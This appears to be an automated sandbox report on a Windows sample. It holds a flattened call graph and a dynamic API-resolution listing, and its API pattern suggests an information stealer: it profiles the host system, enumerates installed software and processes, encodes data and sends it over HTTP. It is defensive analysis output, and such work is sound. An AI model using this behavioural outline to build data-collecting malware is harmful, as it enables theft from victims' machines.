14871->14866 14871->14867 14871->14869 14871->14870 14874 131077 14872->14874 14873 131151 14873->13643 14874->14873 14875 13a820 lstrlen lstrcpy 14874->14875 14875->14874 14877 130db7 14876->14877 14878 130f17 14877->14878 14879 130e27 StrCmpCA 14877->14879 14880 130e67 StrCmpCA 14877->14880 14881 130ea4 StrCmpCA 14877->14881 14882 13a820 lstrlen lstrcpy 14877->14882 14878->13651 14879->14877 14880->14877 14881->14877 14882->14877 14884 130f67 14883->14884 14885 131044 14884->14885 14886 130fb2 StrCmpCA 14884->14886 14887 13a820 lstrlen lstrcpy 14884->14887 14885->13659 14886->14884 14887->14884 14889 13a740 lstrcpy 14888->14889 14890 131a26 14889->14890 14891 13a9b0 4 API calls 14890->14891 14892 131a37 14891->14892 14893 13a8a0 lstrcpy 14892->14893 14894 131a40 14893->14894 14895 13a9b0 4 API calls 14894->14895 14896 131a5b 14895->14896 14897 13a8a0 lstrcpy 14896->14897 14898 131a64 14897->14898 14899 13a9b0 4 API calls 14898->14899 14900 131a7d 14899->14900 14901 13a8a0 lstrcpy 14900->14901 14902 131a86 14901->14902 14903 13a9b0 4 API calls 14902->14903 14904 131aa1 14903->14904 14905 13a8a0 lstrcpy 14904->14905 14906 131aaa 14905->14906 14907 13a9b0 4 API calls 14906->14907 14908 131ac3 14907->14908 14909 13a8a0 lstrcpy 14908->14909 14910 131acc 14909->14910 14911 13a9b0 4 API calls 14910->14911 14912 131ae7 14911->14912 14913 13a8a0 lstrcpy 14912->14913 14914 131af0 14913->14914 14915 13a9b0 4 API calls 14914->14915 14916 131b09 14915->14916 14917 13a8a0 lstrcpy 14916->14917 14918 131b12 14917->14918 14919 13a9b0 4 API calls 14918->14919 14920 131b2d 14919->14920 14921 13a8a0 lstrcpy 14920->14921 14922 131b36 14921->14922 14923 13a9b0 4 API calls 14922->14923 14924 131b4f 14923->14924 14925 13a8a0 lstrcpy 14924->14925 14926 131b58 14925->14926 14927 13a9b0 4 API calls 14926->14927 14928 131b76 14927->14928 14929 13a8a0 lstrcpy 14928->14929 14930 131b7f 14929->14930 14931 137500 6 API calls 14930->14931 14932 131b96 14931->14932 14933 13a920 3 API calls 14932->14933 14934 131ba9 14933->14934 14935 13a8a0 lstrcpy 14934->14935 14936 131bb2 14935->14936 14937 13a9b0 4 API calls 14936->14937 14938 131bdc 14937->14938 14939 13a8a0 lstrcpy 14938->14939 14940 131be5 14939->14940 14941 13a9b0 4 API calls 14940->14941 14942 131c05 14941->14942 14943 13a8a0 lstrcpy 14942->14943 14944 131c0e 14943->14944 15652 137690 GetProcessHeap RtlAllocateHeap 14944->15652 14947 13a9b0 4 API calls 14948 131c2e 14947->14948 14949 13a8a0 lstrcpy 14948->14949 14950 131c37 14949->14950 14951 13a9b0 4 API calls 14950->14951 14952 131c56 14951->14952 14953 13a8a0 lstrcpy 14952->14953 14954 131c5f 14953->14954 14955 13a9b0 4 API calls 14954->14955 14956 131c80 14955->14956 14957 13a8a0 lstrcpy 14956->14957 14958 131c89 14957->14958 15659 1377c0 GetCurrentProcess IsWow64Process 14958->15659 14961 13a9b0 4 API calls 14962 131ca9 14961->14962 14963 13a8a0 lstrcpy 14962->14963 14964 131cb2 14963->14964 14965 13a9b0 4 API calls 14964->14965 14966 131cd1 14965->14966 14967 13a8a0 lstrcpy 14966->14967 14968 131cda 14967->14968 14969 13a9b0 4 API calls 14968->14969 14970 131cfb 14969->14970 14971 13a8a0 lstrcpy 14970->14971 14972 131d04 14971->14972 14973 137850 3 API calls 14972->14973 14974 131d14 14973->14974 14975 13a9b0 4 API calls 14974->14975 14976 131d24 14975->14976 14977 13a8a0 lstrcpy 14976->14977 14978 131d2d 14977->14978 14979 13a9b0 4 API calls 14978->14979 14980 131d4c 14979->14980 14981 13a8a0 lstrcpy 14980->14981 14982 131d55 14981->14982 14983 13a9b0 4 API calls 14982->14983 14984 131d75 14983->14984 14985 13a8a0 lstrcpy 14984->14985 14986 131d7e 14985->14986 14987 1378e0 3 API calls 14986->14987 14988 131d8e 14987->14988 14989 13a9b0 4 API calls 14988->14989 14990 131d9e 14989->14990 14991 13a8a0 lstrcpy 14990->14991 14992 131da7 14991->14992 14993 13a9b0 4 API calls 14992->14993 14994 131dc6 14993->14994 14995 13a8a0 lstrcpy 14994->14995 14996 131dcf 14995->14996 14997 13a9b0 4 API calls 14996->14997 14998 131df0 14997->14998 14999 13a8a0 lstrcpy 14998->14999 15000 131df9 14999->15000 15661 137980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15000->15661 15003 13a9b0 4 API calls 15004 131e19 15003->15004 15005 13a8a0 lstrcpy 15004->15005 15006 131e22 15005->15006 15007 13a9b0 4 API calls 15006->15007 15008 131e41 15007->15008 15009 13a8a0 lstrcpy 15008->15009 15010 131e4a 15009->15010 15011 13a9b0 4 API calls 15010->15011 15012 131e6b 15011->15012 15013 13a8a0 lstrcpy 15012->15013 15014 131e74 15013->15014 15663 137a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15014->15663 15017 13a9b0 4 API calls 15018 131e94 15017->15018 15019 13a8a0 lstrcpy 15018->15019 15020 131e9d 15019->15020 15021 13a9b0 4 API calls 15020->15021 15022 131ebc 15021->15022 15023 13a8a0 lstrcpy 15022->15023 15024 131ec5 15023->15024 15025 13a9b0 4 API calls 15024->15025 15026 131ee5 15025->15026 15027 13a8a0 lstrcpy 15026->15027 15028 131eee 15027->15028 15666 137b00 GetUserDefaultLocaleName 15028->15666 15031 13a9b0 4 API calls 15032 131f0e 15031->15032 15033 13a8a0 lstrcpy 15032->15033 15034 131f17 15033->15034 15035 13a9b0 4 API calls 15034->15035 15036 131f36 15035->15036 15037 13a8a0 lstrcpy 15036->15037 15038 131f3f 15037->15038 15039 13a9b0 4 API calls 15038->15039 15040 131f60 15039->15040 15041 13a8a0 lstrcpy 15040->15041 15042 131f69 15041->15042 15670 137b90 15042->15670 15044 131f80 15045 13a920 3 API calls 15044->15045 15046 131f93 15045->15046 15047 13a8a0 lstrcpy 15046->15047 15048 131f9c 15047->15048 15049 13a9b0 4 API calls 15048->15049 15050 131fc6 15049->15050 15051 13a8a0 lstrcpy 15050->15051 15052 131fcf 15051->15052 15053 13a9b0 4 API calls 15052->15053 15054 131fef 15053->15054 15055 13a8a0 lstrcpy 15054->15055 15056 131ff8 15055->15056 15682 137d80 GetSystemPowerStatus 15056->15682 15059 13a9b0 4 API calls 15060 132018 15059->15060 15061 13a8a0 lstrcpy 15060->15061 15062 132021 15061->15062 15063 13a9b0 4 API calls 15062->15063 15064 132040 15063->15064 15065 13a8a0 lstrcpy 15064->15065 15066 132049 15065->15066 15067 13a9b0 4 API calls 15066->15067 15068 13206a 15067->15068 15069 13a8a0 lstrcpy 15068->15069 15070 132073 15069->15070 15071 13207e GetCurrentProcessId 15070->15071 15684 139470 OpenProcess 15071->15684 15074 13a920 3 API calls 15075 1320a4 15074->15075 15076 13a8a0 lstrcpy 15075->15076 15077 1320ad 15076->15077 15078 13a9b0 4 API calls 15077->15078 15079 1320d7 15078->15079 15080 13a8a0 lstrcpy 15079->15080 15081 1320e0 15080->15081 15082 13a9b0 4 API calls 15081->15082 15083 132100 15082->15083 15084 13a8a0 lstrcpy 15083->15084 15085 132109 15084->15085 15689 137e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15085->15689 15088 13a9b0 4 API calls 15089 132129 15088->15089 15090 13a8a0 lstrcpy 15089->15090 15091 132132 15090->15091 15092 13a9b0 4 API calls 15091->15092 15093 132151 15092->15093 15094 13a8a0 lstrcpy 15093->15094 15095 13215a 15094->15095 15096 13a9b0 4 API calls 15095->15096 15097 13217b 15096->15097 15098 13a8a0 lstrcpy 15097->15098 15099 132184 15098->15099 15693 137f60 15099->15693 15102 13a9b0 4 API calls 15103 1321a4 15102->15103 15104 13a8a0 lstrcpy 15103->15104 15105 1321ad 15104->15105 15106 13a9b0 4 API calls 15105->15106 15107 1321cc 15106->15107 15108 13a8a0 lstrcpy 15107->15108 15109 1321d5 15108->15109 15110 13a9b0 4 API calls 15109->15110 15111 1321f6 15110->15111 15112 13a8a0 lstrcpy 15111->15112 15113 1321ff 15112->15113 15706 137ed0 GetSystemInfo wsprintfA 15113->15706 15116 13a9b0 4 API calls 15117 13221f 15116->15117 15118 13a8a0 lstrcpy 15117->15118 15119 132228 15118->15119 15120 13a9b0 4 API calls 15119->15120 15121 132247 15120->15121 15122 13a8a0 lstrcpy 15121->15122 15123 132250 15122->15123 15124 13a9b0 4 API calls 15123->15124 15125 132270 15124->15125 15126 13a8a0 lstrcpy 15125->15126 15127 132279 15126->15127 15708 138100 GetProcessHeap RtlAllocateHeap 15127->15708 15130 13a9b0 4 API calls 15131 132299 15130->15131 15132 13a8a0 lstrcpy 15131->15132 15133 1322a2 15132->15133 15134 13a9b0 4 API calls 15133->15134 15135 1322c1 15134->15135 15136 13a8a0 lstrcpy 15135->15136 15137 1322ca 15136->15137 15138 13a9b0 4 API calls 15137->15138 15139 1322eb 15138->15139 15140 13a8a0 lstrcpy 15139->15140 15141 1322f4 15140->15141 15714 1387c0 15141->15714 15144 13a920 3 API calls 15145 13231e 15144->15145 15146 13a8a0 lstrcpy 15145->15146 15147 132327 15146->15147 15148 13a9b0 4 API calls 15147->15148 15149 132351 15148->15149 15150 13a8a0 lstrcpy 15149->15150 15151 13235a 15150->15151 15152 13a9b0 4 API calls 15151->15152 15153 13237a 15152->15153 15154 13a8a0 lstrcpy 15153->15154 15155 132383 15154->15155 15156 13a9b0 4 API calls 15155->15156 15157 1323a2 15156->15157 15158 13a8a0 lstrcpy 15157->15158 15159 1323ab 15158->15159 15719 1381f0 15159->15719 15161 1323c2 15162 13a920 3 API calls 15161->15162 15163 1323d5 15162->15163 15164 13a8a0 lstrcpy 15163->15164 15165 1323de 15164->15165 15166 13a9b0 4 API calls 15165->15166 15167 13240a 15166->15167 15168 13a8a0 lstrcpy 15167->15168 15169 132413 15168->15169 15170 13a9b0 4 API calls 15169->15170 15171 132432 15170->15171 15172 13a8a0 lstrcpy 15171->15172 15173 13243b 15172->15173 15174 13a9b0 4 API calls 15173->15174 15175 13245c 15174->15175 15176 13a8a0 lstrcpy 15175->15176 15177 132465 15176->15177 15178 13a9b0 4 API calls 15177->15178 15179 132484 15178->15179 15180 13a8a0 lstrcpy 15179->15180 15181 13248d 15180->15181 15182 13a9b0 4 API calls 15181->15182 15183 1324ae 15182->15183 15184 13a8a0 lstrcpy 15183->15184 15185 1324b7 15184->15185 15727 138320 15185->15727 15187 1324d3 15188 13a920 3 API calls 15187->15188 15189 1324e6 15188->15189 15190 13a8a0 lstrcpy 15189->15190 15191 1324ef 15190->15191 15192 13a9b0 4 API calls 15191->15192 15193 132519 15192->15193 15194 13a8a0 lstrcpy 15193->15194 15195 132522 15194->15195 15196 13a9b0 4 API calls 15195->15196 15197 132543 15196->15197 15198 13a8a0 lstrcpy 15197->15198 15199 13254c 15198->15199 15200 138320 17 API calls 15199->15200 15201 132568 15200->15201 15202 13a920 3 API calls 15201->15202 15203 13257b 15202->15203 15204 13a8a0 lstrcpy 15203->15204 15205 132584 15204->15205 15206 13a9b0 4 API calls 15205->15206 15207 1325ae 15206->15207 15208 13a8a0 lstrcpy 15207->15208 15209 1325b7 15208->15209 15210 13a9b0 4 API calls 15209->15210 15211 1325d6 15210->15211 15212 13a8a0 lstrcpy 15211->15212 15213 1325df 15212->15213 15214 13a9b0 4 API calls 15213->15214 15215 132600 15214->15215 15216 13a8a0 lstrcpy 15215->15216 15217 132609 15216->15217 15763 138680 15217->15763 15219 132620 15220 13a920 3 API calls 15219->15220 15221 132633 15220->15221 15222 13a8a0 lstrcpy 15221->15222 15223 13263c 15222->15223 15224 13265a lstrlen 15223->15224 15225 13266a 15224->15225 15226 13a740 lstrcpy 15225->15226 15227 13267c 15226->15227 15228 121590 lstrcpy 15227->15228 15229 13268d 15228->15229 15773 135190 15229->15773 15231 132699 15231->13663 15961 13aad0 15232->15961 15234 125009 InternetOpenUrlA 15238 125021 15234->15238 15235 1250a0 InternetCloseHandle InternetCloseHandle 15237 1250ec 15235->15237 15236 12502a InternetReadFile 15236->15238 15237->13667 15238->15235 15238->15236 15962 1298d0 15239->15962 15241 130759 15242 130a38 15241->15242 15243 13077d 15241->15243 15244 121590 lstrcpy 15242->15244 15246 130799 StrCmpCA 15243->15246 15245 130a49 15244->15245 16138 130250 15245->16138 15248 130843 15246->15248 15249 1307a8 15246->15249 15252 130865 StrCmpCA 15248->15252 15251 13a7a0 lstrcpy 15249->15251 15253 1307c3 15251->15253 15254 130874 15252->15254 15291 13096b 15252->15291 15255 121590 lstrcpy 15253->15255 15256 13a740 lstrcpy 15254->15256 15257 13080c 15255->15257 15259 130881 15256->15259 15260 13a7a0 lstrcpy 15257->15260 15258 13099c StrCmpCA 15261 130a2d 15258->15261 15262 1309ab 15258->15262 15263 13a9b0 4 API calls 15259->15263 15264 130823 15260->15264 15261->13671 15265 121590 lstrcpy 15262->15265 15266 1308ac 15263->15266 15267 13a7a0 lstrcpy 15264->15267 15268 1309f4 15265->15268 15269 13a920 3 API calls 15266->15269 15270 13083e 15267->15270 15272 13a7a0 lstrcpy 15268->15272 15273 1308b3 15269->15273 15965 12fb00 15270->15965 15274 130a0d 15272->15274 15275 13a9b0 4 API calls 15273->15275 15276 13a7a0 lstrcpy 15274->15276 15277 1308ba 15275->15277 15278 130a28 15276->15278 15279 13a8a0 lstrcpy 15277->15279 16081 130030 15278->16081 15291->15258 15613 13a7a0 lstrcpy 15612->15613 15614 121683 15613->15614 15615 13a7a0 lstrcpy 15614->15615 15616 121695 15615->15616 15617 13a7a0 lstrcpy 15616->15617 15618 1216a7 15617->15618 15619 13a7a0 lstrcpy 15618->15619 15620 1215a3 15619->15620 15620->14494 15622 1247c6 15621->15622 15623 124838 lstrlen 15622->15623 15647 13aad0 15623->15647 15625 124848 InternetCrackUrlA 15626 124867 15625->15626 15626->14571 15628 13a740 lstrcpy 15627->15628 15629 138b74 15628->15629 15630 13a740 lstrcpy 15629->15630 15631 138b82 GetSystemTime 15630->15631 15633 138b99 15631->15633 15632 13a7a0 lstrcpy 15634 138bfc 15632->15634 15633->15632 15634->14586 15637 13a931 15635->15637 15636 13a988 15638 13a7a0 lstrcpy 15636->15638 15637->15636 15639 13a968 lstrcpy lstrcat 15637->15639 15640 13a994 15638->15640 15639->15636 15640->14589 15641->14704 15643 124eee 15642->15643 15644 129af9 LocalAlloc 15642->15644 15643->14592 15643->14595 15644->15643 15645 129b14 CryptStringToBinaryA 15644->15645 15645->15643 15646 129b39 LocalFree 15645->15646 15646->15643 15647->15625 15648->14714 15649->14855 15650->14857 15651->14865 15780 1377a0 15652->15780 15655 1376c6 RegOpenKeyExA 15657 1376e7 RegQueryValueExA 15655->15657 15658 137704 RegCloseKey 15655->15658 15656 131c1e 15656->14947 15657->15658 15658->15656 15660 131c99 15659->15660 15660->14961 15662 131e09 15661->15662 15662->15003 15664 131e84 15663->15664 15665 137a9a wsprintfA 15663->15665 15664->15017 15665->15664 15667 131efe 15666->15667 15668 137b4d 15666->15668 15667->15031 15787 138d20 LocalAlloc CharToOemW 15668->15787 15671 13a740 lstrcpy 15670->15671 15672 137bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15671->15672 15681 137c25 15672->15681 15673 137c46 GetLocaleInfoA 15673->15681 15674 137d18 15675 137d28 15674->15675 15676 137d1e LocalFree 15674->15676 15677 13a7a0 lstrcpy 15675->15677 15676->15675 15680 137d37 15677->15680 15678 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15678->15681 15679 13a8a0 lstrcpy 15679->15681 15680->15044 15681->15673 15681->15674 15681->15678 15681->15679 15683 132008 15682->15683 15683->15059 15685 139493 GetModuleFileNameExA CloseHandle 15684->15685 15686 1394b5 15684->15686 15685->15686 15687 13a740 lstrcpy 15686->15687 15688 132091 15687->15688 15688->15074 15690 132119 15689->15690 15691 137e68 RegQueryValueExA 15689->15691 15690->15088 15692 137e8e RegCloseKey 15691->15692 15692->15690 15694 137fb9 GetLogicalProcessorInformationEx 15693->15694 15695 137fd8 GetLastError 15694->15695 15697 138029 15694->15697 15696 138022 15695->15696 15705 137fe3 15695->15705 15699 132194 15696->15699 15702 1389f0 2 API calls 15696->15702 15701 1389f0 2 API calls 15697->15701 15699->15102 15703 13807b 15701->15703 15702->15699 15703->15696 15704 138084 wsprintfA 15703->15704 15704->15699 15705->15694 15705->15699 15788 1389f0 15705->15788 15791 138a10 GetProcessHeap RtlAllocateHeap 15705->15791 15707 13220f 15706->15707 15707->15116 15709 1389b0 15708->15709 15710 13814d GlobalMemoryStatusEx 15709->15710 15711 138163 __aulldiv 15710->15711 15712 13819b wsprintfA 15711->15712 15713 132289 15712->15713 15713->15130 15715 1387fb GetProcessHeap RtlAllocateHeap wsprintfA 15714->15715 15717 13a740 lstrcpy 15715->15717 15718 13230b 15717->15718 15718->15144 15720 13a740 lstrcpy 15719->15720 15726 138229 15720->15726 15721 138263 15722 13a7a0 lstrcpy 15721->15722 15724 1382dc 15722->15724 15723 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15723->15726 15724->15161 15725 13a8a0 lstrcpy 15725->15726 15726->15721 15726->15723 15726->15725 15728 13a740 lstrcpy 15727->15728 15729 13835c RegOpenKeyExA 15728->15729 15730 1383d0 15729->15730 15731 1383ae 15729->15731 15733 138613 RegCloseKey 15730->15733 15734 1383f8 RegEnumKeyExA 15730->15734 15732 13a7a0 lstrcpy 15731->15732 15743 1383bd 15732->15743 15735 13a7a0 lstrcpy 15733->15735 15736 13843f wsprintfA RegOpenKeyExA 15734->15736 15737 13860e 15734->15737 15735->15743 15738 1384c1 RegQueryValueExA 15736->15738 15739 138485 RegCloseKey RegCloseKey 15736->15739 15737->15733 15741 138601 RegCloseKey 15738->15741 15742 1384fa lstrlen 15738->15742 15740 13a7a0 lstrcpy 15739->15740 15740->15743 15741->15737 15742->15741 15744 138510 15742->15744 15743->15187 15745 13a9b0 4 API calls 15744->15745 15746 138527 15745->15746 15747 13a8a0 lstrcpy 15746->15747 15748 138533 15747->15748 15749 13a9b0 4 API calls 15748->15749 15750 138557 15749->15750 15751 13a8a0 lstrcpy 15750->15751 15752 138563 15751->15752 15753 13856e RegQueryValueExA 15752->15753 15753->15741 15754 1385a3 15753->15754 15755 13a9b0 4 API calls 15754->15755 15756 1385ba 15755->15756 15757 13a8a0 lstrcpy 15756->15757 15758 1385c6 15757->15758 15759 13a9b0 4 API calls 15758->15759 15760 1385ea 15759->15760 15761 13a8a0 lstrcpy 15760->15761 15762 1385f6 15761->15762 15762->15741 15764 13a740 lstrcpy 15763->15764 15765 1386bc CreateToolhelp32Snapshot Process32First 15764->15765 15766 1386e8 Process32Next 15765->15766 15767 13875d CloseHandle 15765->15767 15766->15767 15772 1386fd 15766->15772 15768 13a7a0 lstrcpy 15767->15768 15771 138776 15768->15771 15769 13a9b0 lstrcpy lstrlen lstrcpy lstrcat 15769->15772 15770 13a8a0 lstrcpy 15770->15772 15771->15219 15772->15766 15772->15769 15772->15770 15774 13a7a0 lstrcpy 15773->15774 15775 1351b5 15774->15775 15776 121590 lstrcpy 15775->15776 15777 1351c6 15776->15777 15792 125100 15777->15792 15779 1351cf 15779->15231 15783 137720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15780->15783 15782 1376b9 15782->15655 15782->15656 15784 137780 RegCloseKey 15783->15784 15785 137765 RegQueryValueExA 15783->15785 15786 137793 15784->15786 15785->15784 15786->15782 15787->15667 15789 1389f9 GetProcessHeap HeapFree 15788->15789 15790 138a0c 15788->15790 15789->15790 15790->15705 15791->15705 15793 13a7a0 lstrcpy 15792->15793 15794 125119 15793->15794 15795 1247b0 2 API calls 15794->15795 15796 125125 15795->15796 15952 138ea0 15796->15952 15798 125184 15799 125192 lstrlen 15798->15799 15800 1251a5 15799->15800 15801 138ea0 4 API calls 15800->15801 15802 1251b6 15801->15802 15803 13a740 lstrcpy 15802->15803 15804 1251c9 15803->15804 15805 13a740 lstrcpy 15804->15805 15806 1251d6 15805->15806 15807 13a740 lstrcpy 15806->15807 15808 1251e3 15807->15808 15809 13a740 lstrcpy 15808->15809 15810 1251f0 15809->15810 15811 13a740 lstrcpy 15810->15811 15812 1251fd InternetOpenA StrCmpCA 15811->15812 15813 12522f 15812->15813 15814 1258c4 InternetCloseHandle 15813->15814 15815 138b60 3 API calls 15813->15815 15821 1258d9 ctype 15814->15821 15816 12524e 15815->15816 15817 13a920 3 API calls 15816->15817 15818 125261 15817->15818 15819 13a8a0 lstrcpy 15818->15819 15820 12526a 15819->15820 15822 13a9b0 4 API calls 15820->15822 15824 13a7a0 lstrcpy 15821->15824 15823 1252ab 15822->15823 15825 13a920 3 API calls 15823->15825 15833 125913 15824->15833 15826 1252b2 15825->15826 15827 13a9b0 4 API calls 15826->15827 15828 1252b9 15827->15828 15829 13a8a0 lstrcpy 15828->15829 15830 1252c2 15829->15830 15831 13a9b0 4 API calls 15830->15831 15832 125303 15831->15832 15834 13a920 3 API calls 15832->15834 15833->15779 15835 12530a 15834->15835 15836 13a8a0 lstrcpy 15835->15836 15837 125313 15836->15837 15838 125329 InternetConnectA 15837->15838 15838->15814 15839 125359 HttpOpenRequestA 15838->15839 15841 1258b7 InternetCloseHandle 15839->15841 15842 1253b7 15839->15842 15841->15814 15843 13a9b0 4 API calls 15842->15843 15844 1253cb 15843->15844 15845 13a8a0 lstrcpy 15844->15845 15846 1253d4 15845->15846 15847 13a920 3 API calls 15846->15847 15848 1253f2 15847->15848 15849 13a8a0 lstrcpy 15848->15849 15850 1253fb 15849->15850 15851 13a9b0 4 API calls 15850->15851 15852 12541a 15851->15852 15853 13a8a0 lstrcpy 15852->15853 15854 125423 15853->15854 15855 13a9b0 4 API calls 15854->15855 15856 125444 15855->15856 15857 13a8a0 lstrcpy 15856->15857 15858 12544d 15857->15858 15859 13a9b0 4 API calls 15858->15859 15860 12546e 15859->15860 15861 13a8a0 lstrcpy 15860->15861 15953 138ead CryptBinaryToStringA 15952->15953 15957 138ea9 15952->15957 15954 138ece GetProcessHeap RtlAllocateHeap 15953->15954 15953->15957 15955 138ef4 ctype 15954->15955 15954->15957 15956 138f05 CryptBinaryToStringA 15955->15956 15956->15957 15957->15798 15961->15234 16204 129880 15962->16204 15964 1298e1 15964->15241 15966 13a740 lstrcpy 15965->15966 15967 12fb16 15966->15967 16082 13a740 lstrcpy 16081->16082 16139 13a740 lstrcpy 16138->16139 16140 130266 16139->16140 16141 138de0 2 API calls 16140->16141 16142 13027b 16141->16142 16143 13a920 3 API calls 16142->16143 16144 13028b 16143->16144 16145 13a8a0 lstrcpy 16144->16145 16146 130294 16145->16146 16147 13a9b0 4 API calls 16146->16147 16148 1302b8 16147->16148 16205 12988e 16204->16205 16208 126fb0 16205->16208 16207 1298ad ctype 16207->15964 16211 126d40 16208->16211 16212 126d63 16211->16212 16224 126d59 16211->16224 16212->16224 16225 126660 16212->16225 16214 126dbe 16214->16224 16231 1269b0 16214->16231 16216 126e2a 16217 126ee6 VirtualFree 16216->16217 16219 126ef7 16216->16219 16216->16224 16217->16219 16218 126f41 16222 1389f0 2 API calls 16218->16222 16218->16224 16219->16218 16220 126f26 FreeLibrary 16219->16220 16221 126f38 16219->16221 16220->16219 16223 1389f0 2 API calls 16221->16223 16222->16224 16223->16218 16224->16207 16229 12668f VirtualAlloc 16225->16229 16227 126730 16228 126743 VirtualAlloc 16227->16228 16230 12673c 16227->16230 16228->16230 16229->16227 16229->16230 16230->16214 16232 1269c9 16231->16232 16236 1269d5 16231->16236 16233 126a09 LoadLibraryA 16232->16233 16232->16236 16234 126a32 16233->16234 16233->16236 16238 126ae0 16234->16238 16241 138a10 GetProcessHeap RtlAllocateHeap 16234->16241 16236->16216 16237 126ba8 GetProcAddress 16237->16236 16237->16238 16238->16236 16238->16237 16239 1389f0 2 API calls 16239->16238 16240 126a8b 16240->16236 16240->16239 16241->16240

                              Executed Functions

                              Function 00139860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 139860-139874 call 139750 663 139a93-139af2 LoadLibraryA * 5 660->663 664 13987a-139a8e call 139780 GetProcAddress * 21 660->664 666 139af4-139b08 GetProcAddress 663->666 667 139b0d-139b14 663->667 664->663 666->667 669 139b46-139b4d 667->669 670 139b16-139b41 GetProcAddress * 2 667->670 671 139b68-139b6f 669->671 672 139b4f-139b63 GetProcAddress 669->672 670->669 673 139b71-139b84 GetProcAddress 671->673 674 139b89-139b90 671->674 672->671 673->674 675 139b92-139bbc GetProcAddress * 2 674->675 676 139bc1-139bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,00FF2488), ref: 001398A1
                              • GetProcAddress.KERNEL32(74DD0000,00FF2308), ref: 001398BA
                              • GetProcAddress.KERNEL32(74DD0000,00FF2470), ref: 001398D2
                              • GetProcAddress.KERNEL32(74DD0000,00FF2320), ref: 001398EA
                              • GetProcAddress.KERNEL32(74DD0000,00FF2500), ref: 00139903
                              • GetProcAddress.KERNEL32(74DD0000,00FF9128), ref: 0013991B
                              • GetProcAddress.KERNEL32(74DD0000,00FE5E10), ref: 00139933
                              • GetProcAddress.KERNEL32(74DD0000,00FE5D90), ref: 0013994C
                              • GetProcAddress.KERNEL32(74DD0000,00FF2218), ref: 00139964
                              • GetProcAddress.KERNEL32(74DD0000,00FF2230), ref: 0013997C
                              • GetProcAddress.KERNEL32(74DD0000,00FF2338), ref: 00139995
                              • GetProcAddress.KERNEL32(74DD0000,00FF2380), ref: 001399AD
                              • GetProcAddress.KERNEL32(74DD0000,00FE5E30), ref: 001399C5
                              • GetProcAddress.KERNEL32(74DD0000,00FF2398), ref: 001399DE
                              • GetProcAddress.KERNEL32(74DD0000,00FF23B0), ref: 001399F6
                              • GetProcAddress.KERNEL32(74DD0000,00FE5DB0), ref: 00139A0E
                              • GetProcAddress.KERNEL32(74DD0000,00FF23E0), ref: 00139A27
                              • GetProcAddress.KERNEL32(74DD0000,00FF2458), ref: 00139A3F
                              • GetProcAddress.KERNEL32(74DD0000,00FE5AD0), ref: 00139A57
                              • GetProcAddress.KERNEL32(74DD0000,00FF24B8), ref: 00139A70
                              • GetProcAddress.KERNEL32(74DD0000,00FE5C90), ref: 00139A88
                              • LoadLibraryA.KERNEL32(00FF2518,?,00136A00), ref: 00139A9A
                              • LoadLibraryA.KERNEL32(00FF2560,?,00136A00), ref: 00139AAB
                              • LoadLibraryA.KERNEL32(00FF25A8,?,00136A00), ref: 00139ABD
                              • LoadLibraryA.KERNEL32(00FF2530,?,00136A00), ref: 00139ACF
                              • LoadLibraryA.KERNEL32(00FF25C0,?,00136A00), ref: 00139AE0
                              • GetProcAddress.KERNEL32(75A70000,00FF2548), ref: 00139B02
                              • GetProcAddress.KERNEL32(75290000,00FF2578), ref: 00139B23
                              • GetProcAddress.KERNEL32(75290000,00FF2590), ref: 00139B3B
                              • GetProcAddress.KERNEL32(75BD0000,00FF25D8), ref: 00139B5D
                              • GetProcAddress.KERNEL32(75450000,00FE5E50), ref: 00139B7E
                              • GetProcAddress.KERNEL32(76E90000,00FF91C8), ref: 00139B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00139BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00139BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                              • Instruction ID: 614679c99423c9862a666fad4b6f31916b63a8d8283405dfd32c011538b07139
                              • Opcode Fuzzy Hash: 82ca0a9764306a9175be24a2beb7ca02a5b0355f0f45467cdfe033d063ef2a0c
                              • Instruction Fuzzy Hash: 02A15BB5500A409FD346EFA8EE889563BFDF78C301F04C51AE615A3264D7F9A841EF22
